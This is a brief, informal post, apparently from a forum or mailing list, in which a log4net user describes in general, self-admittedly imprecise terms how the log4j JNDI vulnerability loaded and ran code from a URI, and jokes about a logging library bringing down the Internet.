It's almost Friday ... Many of you might have read the blazing headlines everywhere that the whole Internet is about to crash because of a security vulnerability in log4j. I haven't written Java since early 2001, so I went looking for tech details.
It turns out someone wrote an appender (in our log4net terms) that parsed a Uri out of a special bit of syntax, then blindly loaded and ran what was at the Uri. I mean, what could possibly go wrong? I think that this guilty JNDI appender is available by default, that is, it's in the JAR or something like that (I can't get further fine details on that). So it's a bit like *Aircrash Investigations* where it takes multiple things to go wrong and make a bigger wrong. Who could have imagined that a logging library would bring the Internet down?! *Greg*
